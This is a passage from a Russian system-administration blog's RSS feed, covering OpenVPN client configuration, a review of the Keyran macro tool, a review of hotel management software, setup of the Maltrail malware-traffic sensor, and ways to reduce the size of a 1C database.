<code>iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -j MASQUERADE</code></p>
<p>При условии, что наша OpenVPN сеть имеет такую адресацию.</p>
<p>Ну вроде бы всё.</p>
<h3>Выпускаем ключи доступа</h3>
<p>Тут всё как в прошлой статье, единственное, что для мобильных клиентов нужно поставить приложение OpenVPN и подготовить .ovpn-конфигурацию в виде одного файла, куда вставить содержимое ключей между соответствующими тегами:</p>
<p><code>#!/bin/bash<br />
cd /etc/openvpn/easy-rsa/<br />
./easyrsa build-client-full $1<br />
cp pki/issued/$1.crt /home/********/<br />
cp pki/private/$1.key /home/********/<br />
cd /home/********/<br />
cat $1.crt | sed -n '/^-----BEGIN/,/-----END/p' &gt; $1.crtcl<br />
cat stage1 &gt; $1.ovpn<br />
cat $1.crtcl &gt;&gt; $1.ovpn<br />
echo '&lt;/cert&gt;' &gt;&gt; $1.ovpn<br />
echo '' &gt;&gt; $1.ovpn<br />
echo '&lt;key&gt;' &gt;&gt; $1.ovpn<br />
cat $1.key &gt;&gt; $1.ovpn<br />
echo '&lt;/key&gt;' &gt;&gt; $1.ovpn<br />
cat stage2 &gt;&gt; $1.ovpn<br />
chown ******** /home/********/$1.ovpn</code></p>
<p>Вот такой скриптик накидал, он конечно не очень лаконичный, зато работает)  Формирует .ovpn следующего содержания:</p>
<p><code>remote &lt;IP сервера&gt; 1194<br />
proto udp<br />
resolv-retry infinite<br />
cipher AES-256-CBC<br />
persist-key<br />
persist-tun<br />
client<br />
dev tun<br />
&lt;ca&gt;<br />
-----BEGIN CERTIFICATE-----<br />
здесь сертификат удостоверяющего центра, общее для всех<br />
-----END CERTIFICATE-----<br />
&lt;/ca&gt;<br />
&lt;cert&gt;<br />
-----BEGIN CERTIFICATE-----<br />
здесь содержимое индивидуального сертификата пользователя (/etc/openvpn/easy-rsa/pki/issued/ из этого каталога, файл *.crt)<br />
-----END CERTIFICATE-----<br />
&lt;/cert&gt;<br />
&lt;key&gt;<br />
-----BEGIN ENCRYPTED PRIVATE KEY-----<br />
здесь содержимое приватного ключа пользователя (/etc/openvpn/easy-rsa/pki/private/ из этого каталога, файл *.key)<br />
-----END ENCRYPTED PRIVATE KEY-----<br />
&lt;/key&gt;<br />
&lt;tls-auth&gt;<br />
-----BEGIN OpenVPN Static key V1-----<br />
здесь содержимое ключа DH, общее для всех<br />
-----END OpenVPN Static key V1-----<br />
&lt;/tls-auth&gt;<br />
key-direction 1</code></p>
<p>Когда конфигурация будет сформирована, её можно смело скормить приложению:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/photo_2022-07-17_14-09-00.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7360" src="https://litl-admin.ru/wp-content/uploads/2022/07/photo_2022-07-17_14-09-00-286x620.png" alt="" width="286" height="620" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/photo_2022-07-17_14-09-00-286x620.png 286w, https://litl-admin.ru/wp-content/uploads/2022/07/photo_2022-07-17_14-09-00.png 300w" sizes="(max-width: 286px) 100vw, 286px" /><meta itemprop="width" content="286"><meta itemprop="height" content="620"></span></a></p>
<p>Вся настройка заняла буквально 10 минут.</p>
<p>Всё, подключение происходит практически мгновенно, никакой рекламы и минимальные задержки) Всем добра.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/utility/sobstvennyj-vpn-dlya-dostupa-k-zakrytym-resursam-na-primere-instagram.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Keyran для автоматизации клавиатуры и мыши</title>
		<link>https://litl-admin.ru/utility/keyran-dlya-avtomatizacii-klaviatury-i-myshi.html</link>
					<comments>https://litl-admin.ru/utility/keyran-dlya-avtomatizacii-klaviatury-i-myshi.html#comments</comments>
		
		
		<pubDate>Wed, 13 Jul 2022 05:48:17 +0000</pubDate>
				<category><![CDATA[Обзоры]]></category>
		<category><![CDATA[Утилиты]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7348</guid>

					<description><![CDATA[Добрый день всем. Сегодня у нас обзор на любопытную программу, предназначенную для автоматизации операций ввода посредством клавиатуры и мыши. Программа Keyran, скачать её можно с оф.сайта. Что за программа? Внешний вид программы представлен на скрине ниже: Возможности: Подавление отдачи в шутерах; Автоматизация различных рутинных действий в играх; Работа даже со свёрнутым окном; Распознавание цвета пиксела; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Добрый день всем. Сегодня у нас обзор на любопытную программу, предназначенную для автоматизации операций ввода посредством клавиатуры и мыши.</p>
<p>Программа <strong>Keyran</strong>, скачать её можно с <a href="https://keyran.net/ru/" target="_blank" rel="noopener sponsored">оф.сайта</a>.</p>
<h2>Что за программа?</h2>
<p>Внешний вид программы представлен на скрине ниже:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/keyran1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7349" src="https://litl-admin.ru/wp-content/uploads/2022/07/keyran1-620x255.png" alt="" width="620" height="255" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/keyran1-620x255.png 620w, https://litl-admin.ru/wp-content/uploads/2022/07/keyran1-768x316.png 768w, https://litl-admin.ru/wp-content/uploads/2022/07/keyran1.png 801w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="255"></span></a></p>
<h3>Возможности:</h3>
<ol>
<li>Подавление отдачи в шутерах;</li>
<li>Автоматизация различных рутинных действий в играх;</li>
<li>Работа даже со свёрнутым окном;</li>
<li>Распознавание цвета пиксела;</li>
<li>Установка произвольных задержек.</li>
<li>Совместимость с макросами формата .AMC.</li>
</ol>
<h3>Библиотека макросов</h3>
<p>Уже &#8220;из коробки&#8221; доступно несколько тысяч готовых &#8220;скриптов&#8221; для различных игр и приложений. Например, я когда-то резался в Terraria и сталкивался с утомительным копанием туннеля. Так что кто-то уже заморочился и записал макрос для автоматического рытья в нужную сторону) конечно нужно контролировать процесс, чтобы не провалиться в проломы или лаву, но скрипты можно дорабатывать и комбинировать между собой:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/keyran2.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7350" src="https://litl-admin.ru/wp-content/uploads/2022/07/keyran2-620x412.png" alt="" width="620" height="412" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/keyran2-620x412.png 620w, https://litl-admin.ru/wp-content/uploads/2022/07/keyran2-768x511.png 768w, https://litl-admin.ru/wp-content/uploads/2022/07/keyran2.png 880w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="412"></span></a></p>
<h3>Редактор скриптов</h3>
<p>На случай отсутствия готового макроса, всегда можно записать или сконструировать свой, кастомный:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/keyran3.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7351" src="https://litl-admin.ru/wp-content/uploads/2022/07/keyran3-620x434.png" alt="" width="620" height="434" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/keyran3-620x434.png 620w, https://litl-admin.ru/wp-content/uploads/2022/07/keyran3-768x538.png 768w, https://litl-admin.ru/wp-content/uploads/2022/07/keyran3.png 850w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="434"></span></a></p>
<p>В общем-то не составит большого труда составить какую-нибудь комбинацию ударов для эмулятора Sega и раритетной Mortal Kombat3 Ultimate:).</p>
<p>Возможности редактора включают в себя операции перехода, циклы, работу с раскладками клавиатуры, получение цвета пиксела. Доступно 4 переменных, значения которых можно учитывать во время работы.</p>
<h3>Зачем нужно определение цвета пиксела?</h3>
<p>Помню, был в игре &#8220;Сапёр&#8221; (встроенной в старые версии Windows) чит-код, позволяющий узнавать, есть ли под клеткой, на которую наведён указатель мыши мина или нет. Дело в том, что после определённого кода в левом верхнем углу экрана загоралась или гасла белая точка в зависимости от типа клетки (с миной или нет). Поэтому вполне можно реализовать такой чит-скрипт, который раз в N миллисекунд считывает цвет конкретной точки на экране и в зависимости от этого или кликает на клетку или ставит флажок (&#8220;мина&#8221;). Да мало ли ещё какие задачи бывают? Распознать движение на экране, появление посторонних окон и т.д.</p>
<h3>Централизованное хранение настроек</h3>
<p>Программа Keyran поддерживает хранение своих скриптов централизованно, для этого нужно завести аккаунт на их сервере и войти под своим &#8220;профилем&#8221;. Это обеспечит синхронизацию всех настроек и макросов.</p>
<p>Не буду перепечатывать всю информацию с сайта, лучше продемонстрирую функционал на небольшой практической работе. Если интересно &#8211; скачайте с оф.сайта и потестируйте.</p>
<h2>Практический этап</h2>
<p>Написал себе небольшой макрос, который печатает команды:</p>
<p><code>git add .<br />
git commit -m "-"</code></p>
<p>Небольшая задержка в 24 мс. между нажатиями очень желательна, чтобы драйвер успевал корректно отработать и не загнал одномоментно большое количество событий.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-13_16-36-59.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7357" src="https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-13_16-36-59-620x462.png" alt="" width="620" height="462" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-13_16-36-59-620x462.png 620w, https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-13_16-36-59-940x700.png 940w, https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-13_16-36-59-768x572.png 768w, https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-13_16-36-59.png 1065w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="462"></span></a></p>
<p>Вешаю его на сочетание клавиш Ctrl+Q:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-11_17-40-08.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7354" src="https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-11_17-40-08.png" alt="" width="519" height="405" /><meta itemprop="width" content="519"><meta itemprop="height" content="405"></span></a></p>
<p>Затем нажимаю большую кнопку &#8220;Play&#8221; в главном окне и вуаля! Для ленивых разработчиков при работе с Git есть небольшой помощник.</p>
<p>По информации с сайта разработчиков, программа всё-таки больше ориентирована на геймеров. Решение гибких прикладных задач возможно, но в достаточно узких пределах. Чтож, на всякий продукт есть своя целевая аудитория.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/utility/keyran-dlya-avtomatizacii-klaviatury-i-myshi.html/feed</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Обзор программного обеспечения для автоматизации гостиницы</title>
		<link>https://litl-admin.ru/obzory/obzor-programmnogo-obespecheniya-dlya-avtomatizacii-gostinicy.html</link>
					<comments>https://litl-admin.ru/obzory/obzor-programmnogo-obespecheniya-dlya-avtomatizacii-gostinicy.html#respond</comments>
		
		
		<pubDate>Wed, 06 Jul 2022 23:38:59 +0000</pubDate>
				<category><![CDATA[Обзоры]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7342</guid>

					<description><![CDATA[Всем привет! Продолжаем рубрику обзоров. И сегодня в фокусе внимания программа для автоматизации гостиницы: Bnovo PMS. Основные возможности Шахматка Традиционно в приложениях такого класса есть планировщик в виде развернутого календаря &#8220;шахматка&#8221;, позволяющий визуализировать степень занятости номеров. Отчётность Расширенная отчётность &#8211; консолидация данных в одном месте, с возможностью отфильтровать данные по периодам, сделать срез по номерам, [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Всем привет! Продолжаем рубрику обзоров. И сегодня в фокусе внимания программа для <a href="https://bnovo.ru/bnovo-pms/" target="_blank" rel="noopener sponsored">автоматизации гостиницы</a>: <strong>Bnovo PMS.</strong></p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/pms.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7343" src="https://litl-admin.ru/wp-content/uploads/2022/07/pms-620x352.png" alt="" width="620" height="352" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/pms-620x352.png 620w, https://litl-admin.ru/wp-content/uploads/2022/07/pms-768x436.png 768w, https://litl-admin.ru/wp-content/uploads/2022/07/pms.png 800w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="352"></span></a></p>
<h2>Основные возможности</h2>
<h3>Шахматка</h3>
<p>Традиционно в приложениях такого класса есть планировщик в виде развернутого календаря &#8220;шахматка&#8221;, позволяющий визуализировать степень занятости номеров.</p>
<h3>Отчётность</h3>
<p>Расширенная отчётность &#8211; консолидация данных в одном месте, с возможностью отфильтровать данные по периодам, сделать срез по номерам, источникам и многим другим параметрам.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/manager-report.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7344" src="https://litl-admin.ru/wp-content/uploads/2022/07/manager-report-620x352.png" alt="" width="620" height="352" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/manager-report-620x352.png 620w, https://litl-admin.ru/wp-content/uploads/2022/07/manager-report-768x436.png 768w, https://litl-admin.ru/wp-content/uploads/2022/07/manager-report.png 800w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="352"></span></a></p>
<h3>Менеджер каналов</h3>
<p>Позволяет настроить интеграцию с множеством сервисов онлайн-бронирования. И да, многие из них с учётом геополитической обстановки вам уже не пригодятся, но тем не менее, возможность приятная.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-07_10-26-35.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7345" src="https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-07_10-26-35-620x391.png" alt="" width="620" height="391" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-07_10-26-35-620x391.png 620w, https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-07_10-26-35-768x485.png 768w, https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-07_10-26-35.png 786w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="391"></span></a>Интеграция с подобными сервисами позволяет избежать так называемого &#8220;овербукинга&#8221;, когда из-за проблем синхронизации один и тот же номер бронируется на одно время в различных источниках.</p>
<h3>Модуль бронирования</h3>
<p>Современный адаптивный под различные устройства модуль, позволяет осуществить бронирование и приём оплаты прям с вашего сайта или соц.сетей.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-07_10-29-53.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7346" src="https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-07_10-29-53-620x462.png" alt="" width="620" height="462" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-07_10-29-53-620x462.png 620w, https://litl-admin.ru/wp-content/uploads/2022/07/2022-07-07_10-29-53.png 650w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="462"></span></a>Гибкие настройки модуля, а также интеграция с эквайрингом позволяют развернуть работу практически &#8220;из коробки&#8221;.</p>
<h3>Прямая ссылка</h3>
<p>Интересная функция, позволяет отправить ссылку на предзаполненную форму вашему гостю через SMS или удобный мессенджер, гостю останется только проверить бронирование и оплатить его.</p>
<h2>Стоимость продукта</h2>
<p>Продукт коммерческий (как всегда, в системах такого уровня). Но в сегменте b2b это ожидаемо. Есть возможность получить поддержку по гос.программе, это даст дополнительную скидку в 50%.</p>
<p>Для расчёта цены на сайте есть онлайн-калькулятор, скидки есть также за подписку сразу на длительный период (уже от полугода).</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/obzory/obzor-programmnogo-obespecheniya-dlya-avtomatizacii-gostinicy.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Maltrail – обнаружение работы вредоносного ПО в сетевом трафике</title>
		<link>https://litl-admin.ru/linux/maltrail-obnaruzhenie-raboty-vredonosnogo-po-v-setevom-trafike.html</link>
					<comments>https://litl-admin.ru/linux/maltrail-obnaruzhenie-raboty-vredonosnogo-po-v-setevom-trafike.html#respond</comments>
		
		
		<pubDate>Tue, 05 Jul 2022 06:07:11 +0000</pubDate>
				<category><![CDATA[Linux]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7338</guid>

					<description><![CDATA[Иногда в сетевом трафике могут попадаться характерные для работы вредоносного программного обеспечения артефакты, поэтому совсем не лишним будет исследовать &#8220;живой&#8221; трафик или записанные фрагменты специальным сенсором. Из бесплатных вполне неплохо себя зарекомендовали Snort и Maltrail, о последнем я и расскажу. Под работу сенсора я выделил небольшую виртуалку с двумя интерфейсами &#8211; один &#8211; для управления, [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Иногда в сетевом трафике могут попадаться характерные для работы вредоносного программного обеспечения артефакты, поэтому совсем не лишним будет исследовать &#8220;живой&#8221; трафик или записанные фрагменты специальным сенсором. Из бесплатных вполне неплохо себя зарекомендовали Snort и Maltrail, о последнем я и расскажу.</p>
<p>Под работу сенсора я выделил небольшую виртуалку с двумя интерфейсами &#8211; один &#8211; для управления, в Management VLAN, вторую &#8211; для трафика, подал туда зеркало (span-порт коммутатора).</p>
<h2>Установка Maltrail</h2>
<p>Maltrail представляет собой несколько python-скриптов, так что оптимальнее будет слить их с github:</p>
<p><code># git clone https://github.com/stamparm/maltrail</code></p>
<p>Затем переходим в рабочий каталог:</p>
<p><code># cd ./maltrail</code></p>
<p>и немного правим конфиг:</p>
<p><code># nano maltrail.conf</code></p>
<p>Указываю интерфейс для прослушки:</p>
<p><code>...<br />
MONITOR_INTERFACE ens224<br />
...</code></p>
<h2>Запуск Maltrail</h2>
<p>Сам продукт состоит как бы из двух частей:</p>
<ol>
<li>Анализатор трафика:<br />
<code># python3 sensor.py</code></li>
<li>Веб-сервер для просмотра статистики:<br />
<code># python3 server.py</code></li>
</ol>
<p>При запуске сенсор начинает загрузку своих сигнатур из различных источников и, в последствии, начинает слушать трафик на интерфейсе.</p>
<p>Кстати, если на не нужно &#8220;живое&#8221; прослушивание, то можно просто скормить сенсору .PCAP-файл используя ключ -r и указав путь к записанному трафику (например тем же tcpdump и т.д.). Эффект будет тот же.</p>
<h2>Как выглядит:</h2>
<p>При первом запуске предложит авторизоваться. Пароль (хеш) хранится в конфиге. По умолчанию входим как <strong>admin:changeme!</strong></p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7339" src="https://litl-admin.ru/wp-content/uploads/2022/07/1.png" alt="" width="368" height="218" /><meta itemprop="width" content="368"><meta itemprop="height" content="218"></span></a></p>
<p>Все события классифицируются по потокам, важности, источникам и т.д. Рассмотрим, например, наиболее важные:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/2.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7340" src="https://litl-admin.ru/wp-content/uploads/2022/07/2-620x593.png" alt="" width="620" height="593" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/2-620x593.png 620w, https://litl-admin.ru/wp-content/uploads/2022/07/2-768x734.png 768w, https://litl-admin.ru/wp-content/uploads/2022/07/2.png 916w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="593"></span></a>Как видим, судя по трафику, функционирует некий бот, который запрашивает характерные DNS-имена. К сожалению, на текущем этапе выявить источник у меня не получится &#8211; записал трафик после NAT, но по крайней мере можно уже поставить конкретную ловушку на DNS с записью внутреннего &#8220;серого&#8221; IP-адреса и найти инфицированный комп.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/3.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7341" src="https://litl-admin.ru/wp-content/uploads/2022/07/3-620x246.png" alt="" width="620" height="246" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/3-620x246.png 620w, https://litl-admin.ru/wp-content/uploads/2022/07/3-940x374.png 940w, https://litl-admin.ru/wp-content/uploads/2022/07/3-768x305.png 768w, https://litl-admin.ru/wp-content/uploads/2022/07/3.png 1459w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="246"></span></a></p>
<p>Кстати, маркеры событий тут бывают разных типов:</p>
<ol>
<li>Эвристика (предположения) &#8211; активность, которая с большой долей вероятности является вредоносной.</li>
<li>Известные DNS-имена, IP-адреса, UA (UserAgent-ы) &#8211; это уже некое подобие антивирусных сигнатур.</li>
<li>Признаки масс-сканирования, подозрительный домен, выходная нода TOR-сети (тоже подозрительно), подозрительные скрипты и т.д.</li>
</ol>
<p>Системные требования не очень высокие, поэтому организовать мониторинг трафика такими малыми затратами, я считаю, целесообразно.</p>
<p>И кстати, логи падают в текстовом виде в /var/log/maltrail/дата, так что без проблем можно будет сделать парсер или направить их в систему корреляции событий.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/linux/maltrail-obnaruzhenie-raboty-vredonosnogo-po-v-setevom-trafike.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Как уменьшить размер базы данных 1С 8.3</title>
		<link>https://litl-admin.ru/1s/kak-umenshit-razmer-bazy-dannyx-1s-8-3.html</link>
					<comments>https://litl-admin.ru/1s/kak-umenshit-razmer-bazy-dannyx-1s-8-3.html#respond</comments>
		
		
		<pubDate>Sun, 19 Jun 2022 06:47:37 +0000</pubDate>
				<category><![CDATA[1С]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7331</guid>

					<description><![CDATA[В процессе работы с информационной базой 1С её размер постоянно растет. Виной тому, естественно являются данные, которые ежедневно вносятся туда пользователями. Причем, в базе хранятся не только данные, относящиеся к учету. Там присутствуют ещё и системные, вспомогательные данные, без которых функционирования всей системы было бы невозможным. Эти системные данные называются «метаданные» &#8211; информация о структуре [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>В процессе работы с информационной базой 1С её размер постоянно растет. Виной тому, естественно являются данные, которые ежедневно вносятся туда пользователями. Причем, в базе хранятся не только данные, относящиеся к учету. Там присутствуют ещё и системные, вспомогательные данные, без которых функционирования всей системы было бы невозможным. Эти системные данные называются «метаданные» &#8211; информация о структуре базы данных, об алгоритмах обработки этих данных и многое другое. Разработчики 1С не дремлют, постоянно развивая возможности и функциональность базы, поэтому структура базы данных, количество программного кода постоянно увеличивается. Как результат, чем дальше развивалась 1С, тем больше места занимали даже новые, пустые базы, в которых содержатся только системные данные. Просто для сравнения: пустая база 1С Бухгалтерии версии 7.7 занимала 100-150 Мб. Версии 8.2 – около 500 МБ, а версия 8.3 может достигать 1-2 ГБ. Чтобы было понятнее: создав пустую базу 1С бухгалтерии потребуется минимум 1-2 ГБ свободного места. А если туда начать вносить пользовательские данные, да и ещё делать это с помощью 50 пользователей? Ответ очевиден: для любой базы данных нужно много памяти. А для 1С нужно ещё больше:)</p>
<p>Не будем забывать и про необходимость хранения архивных копий базы данных. Если долго и активно пользоваться базой 1С, если количество пользователей уже не маленькое, то конечно, начинает возникать вопрос об объеме информационной базы. Где взять 50-100 ГБ свободного места для базы данных и еще раз в 10 больше этого для хранения ежедневных копий? А если база занимает уже 300-500 ГБ? А если она не одна, а их 10?</p>
<p>В этой статье мы расскажем, на какие хитрости можно пойти, чтобы сэкономить место на дисках и уменьшить размеры базы данных 1С.</p>
<h2>Удаление помеченных объектов</h2>
<p>Очень часто, в базе 1С существуют ненужные данные, которые помечены на удаление, но ещё не удалены. Для системы, они ничем не отличаются от обычных данных и занимают ровно столько же места. Но, если данные не нужны для учета, зачем их хранить? Хранить их в надежде, что они когда-то понадобятся весьма странная затея: как показывает практика, пользователи регулярно вносят данные повторно и не проверяют, нет ли таких данных среди помеченных на удаление. Так что мы крайне рекомендуем Вам не лениться и провести процедуру удаления помеченных объектов. А ещё лучше, если Вы настроите регулярное удаление объектов по расписанию, например, раз в неделю.<br />
Возможно, эта процедура не пройдет гладко, придется разобраться с так называемой «ссылочной целостностью». Дело в том, что 1С не даст удалить объект, если на него ссылаются другие объекты. И может оказаться, что, например, договор закрыт, документы по нему не актуальны. Но договор удалять нельзя, потому что документы, которые на него ссылаются, не помечены на удаление. С такими проблемами придется разбираться вручную, но это стоит того. Это даст хорошие возможности по сохранению свободного места.<br />
Как удалить данные мы уже писали <a href="https://amk.expert/blog/obzory-po-1s/udalenie-pomechennykh-obektov-iz-bazy-1s/">здесь</a>.</p>
<h2>Удаление ненужных данных</h2>
<p>Этот пункт вытекает из предыдущего: очень часто данные уже не нужны или даже никогда не были нужны, но они прекрасно существую в базе данных и занимают кучу свободного места на дисках. Это могут быть, например, данные классификаторов адресов ФИАС/КЛАДР. Представьте ситуацию, Ваша организация работает в одном регионе, у неё нет контрагентов из другого региона, но в базу загружен классификатор адресов всей России. Совершенно очевидно, что подход «на всякий случай пусть будет», это не то, что требуется в такой ситуации. Данные адресов всегда можно загрузить дополнительно, а займет это всего пару минут.<br />
Аналогичная проблема может встречаться с избыточными данными по ключевым справочникам, например, по справочнику «номенклатура» или «контрагенты». Кто-то, когда-то, загрузил в справочник номенклатуры 100 000 позиций, а используется в реальности только 1 000. Или решил загрузить всех контрагентов региона, «на всякий случай».<br />
Все такие ситуации придется отрабатывать, к сожалению, вручную. Нет универсального механизма, который бы сразу сказал нужны эти данные или нет.</p>
<h2>Сжатие базы средствами 1С или SQL.</h2>
<p>Современные СУБД, да и 1С (в файловом режиме работы) функционируют следующим образом: когда им требуется свободное места на диске, чтобы что-то записать, они просят не ровно столько, сколько нужно, а берут с запасом. Например, нужно 10 МБ, а берут сразу 100 МБ. Чтобы не просить потом ещё раз. А если данные удалить и уже не требуется столько свободного места, то они все равно не вернут его просто так. Оставят про запас. Вот такие они запасливые:)<br />
В конфигураторе 1С есть специальная функция, которая как раз выполняет функцию по освобождению этого «незанятого» свободного места. Но работает она только для файлового режима 1С:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/06/1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7332" src="https://litl-admin.ru/wp-content/uploads/2022/06/1.png" alt="" width="469" height="421" /><meta itemprop="width" content="469"><meta itemprop="height" content="421"></span></a></p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/06/2.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7333" src="https://litl-admin.ru/wp-content/uploads/2022/06/2.png" alt="" width="559" height="476" /><meta itemprop="width" content="559"><meta itemprop="height" content="476"></span></a></p>
<p>Вариант для SQL является слишком сложным для обычных пользователей, поэтому публиковать мы его не будем.</p>
<p>Обращаем Ваше внимание на то, что такую процедуру лучше проводить после серьёзных изменений в базе данных 1С, например, после удаления помеченных объектов. В противном случае, размер базы данных достаточно быстро вернется к первоначальным значениям.</p>
<h2>Удаление журнала регистрации 1С</h2>
<p>Журнал регистрации 1С – это специальный механизм для хранения действий пользователей. Вот удалили документ, кто это сделал и когда? На все это может ответить журнал регистрации.<br />
И его можно настраивать. Выбирать события, какие будут регистрироваться, разделять, ну и сокращать. Порой это очень полезно – нет смысла хранить данные 5 летней давности, а вот данные месячной давности очень даже нужны.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/06/3.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7334" src="https://litl-admin.ru/wp-content/uploads/2022/06/3.png" alt="" width="425" height="435" /><meta itemprop="width" content="425"><meta itemprop="height" content="435"></span></a></p>
